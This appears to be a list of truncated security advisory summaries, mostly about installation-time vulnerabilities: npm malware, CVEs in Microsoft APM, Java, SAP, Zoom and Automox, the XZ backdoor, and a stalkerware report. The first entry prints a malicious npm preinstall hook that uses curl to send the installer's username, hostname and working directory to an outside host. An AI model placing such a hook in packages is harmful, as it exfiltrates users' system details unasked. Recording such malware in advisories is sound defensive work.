MAL-2026-4605 Malicious code in mamadoos-test (npm)
Source: amazon-inspector (21b5454856fbb360a162083d9d582eba3839b7105ce6e36490e188b3729388d4). package.json declares a preinstall lifecycle hook that runs curl https://huntr.site/depconf/$whoami@$hostname?pwd=$pwd, embedding the installer's OS...
CVE-2026-45539 Microsoft APM: Symlinks under `.apm/prompts/` and `.apm/agents/` are dereferenced during `apm install`, copying host-local file contents into the project tree
Microsoft APM is an open-source, community-driven dependency manager for AI agents. From 0.5.4 to 0.12.4, two primitive integrators in apm-cli enumerate package files with bare Path.glob / Path.rglob calls and read each match with Path.read_text, transparently following symbolic links. A symlink...
uutils coreutils security vulnerability
uutils coreutils is a cross-platform core command-line toolset developed by Uutils. There is a security vulnerability in uutils coreutils, which stems from a race condition when the -D flag is used in the install process. This could allow attackers with concurrent write privileges to redirect...
EUVD-2026-2749
A local privilege escalation vulnerability exists during the installation of Epic Games Store via the Microsoft Store. A low-privilege user can replace a DLL file during the installation process, which may result in unintended elevation of privileges...
CVE-2023-31403
SAP Business One installation - version 10.0, does not perform proper authentication and authorization checks for SMB shared folder. As a result, any malicious user can read and write to the SMB shared folder. Additionally, the files in the folder can be executed or be used by the installation...
CVE-2025-50063
Vulnerability in Oracle Java SE component: Install. The supported version that is affected is Oracle Java SE: 8u451. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle Java SE executes to compromise Oracle Java SE. Successful attacks...
XZ Utils Backdoor
The cybersecurity world got really lucky last week. An intentionally placed backdoor in XZ Utils, an open-source compression utility, was pretty much accidentally discovered by a Microsoft engineer, weeks before it would have been incorporated into both Debian and Red Hat Linux. From Ars Technica:...
Code injection
Mattermost fails to verify whether the requestor is a sysadmin before allowing install requests to the Apps, allowing a regular user to send install requests to the Apps...
CVE-2023-0975
A vulnerability exists in Trellix Agent for Windows version 5.7.8 and earlier, that allows local users, during install/upgrade workflow, to replace one of the Agent’s executables before it can be executed. This allows the user to elevate their permissions...
PT-2023-1100 · Zoom · Zoom Rooms Installer For Windows
Name of the Vulnerable Software and Affected Versions: Zoom Rooms Installer for Windows versions prior to 5.12.6 Description: The issue is related to a local privilege escalation vulnerability. A local low-privileged user could exploit this vulnerability during the install process to escalate the...
CVE-2022-27904
Automox Agent for macOS before version 39 was vulnerable to a time-of-check/time-of-use TOCTOU race-condition attack during the agent install process...
CVE-2022-27904
Automox Agent for macOS is affected by CVE-2022-27904 due to a time-of-check/time-of-use (TOCTOU) race condition during installation. The issue also involves improper access control on a file used by the PostInstall script, enabling an unprivileged user to obtain root access. Affected versions ar...
PT-2022-18679 · Automox · Automox Agent For Macos
Name of the Vulnerable Software and Affected Versions: Automox Agent for macOS versions prior to 39; Automox Agent for macOS versions prior to 37. Description: The issue is related to a time-of-check/time-of-use TOCTOU race-condition attack that can occur during the agent install process. It also...
Mozilla: Time-of-check time-of-use bug when verifying add-on signatures
A flaw was found in Mozilla. The Mozilla Foundation Security Advisory describes this flaw as follows: When installing an add-on, Firefox verified the signature before prompting the user; but while the user was confirming the prompt, the underlying add-on file could have been modified, and Firefox...
This Stalkerware Delivers Extra-Creepy Features
Researchers are sending up a red flag over the distribution of an aggressive stalkerware app called Monitor Minor. In a report released Monday, researchers said the Android version of the app gives stalkers near absolute control of targeted devices, going so far as allowing them to capture the...
Design/Logic Flaw
ImpressCMS 1.3.10 has XSS via the PATHINFO to htdocs/install/index.php, htdocs/install/pagelangselect.php, or htdocs/install/pagemodcheck.php...
JDK: unspecified vulnerability fixed in 8u171 and 10.0.1 (Install)
Vulnerability in the Java SE component of Oracle Java SE subcomponent: Install. Supported versions that are affected are Java SE: 8u162 and 10. Difficult to exploit vulnerability allows unauthenticated attacker with logon to the infrastructure where Java SE executes to compromise Java SE...
Sandstorm Server-Side Request Forgery Vulnerability
Sandstorm is a personal cloud platform. The platform features file storage, application management, task and project management, and more. A server-side request forgery vulnerability exists in the install application process in versions prior to Sandstorm build 0.203. A remote attacker can exploi...
X7CHAT 1.3.6b - Add Admin Exploit
No description provided by source. Author: d4rk-h4ck3r. Site: www.vbspiders.com/vb. Team: Tunisian Security TeaM. Dork: powered by x7 chat 1.3.6b. Exploit-DB Notes: Vendor has already addressed this issue and even provided a solution in Docs/INSTALL.txt: After finishing...
ShopEx Single <= 4.5.1 - Multiple Vulnerabilities
No description provided by source. Exploit Title: ShopEx <= Single V4.5.1 Multiple Vulnerabilities. Date: 30/01/10. Author: cp77fk4r | empty0pageSHIFT+2gmail.com | www.DigitalWhisper.co.il. Software Link: http://www.shopex.cn | http://www.shopex.cn/download/. Version: <= Single V4.5.1. Tested on: PHP Cro...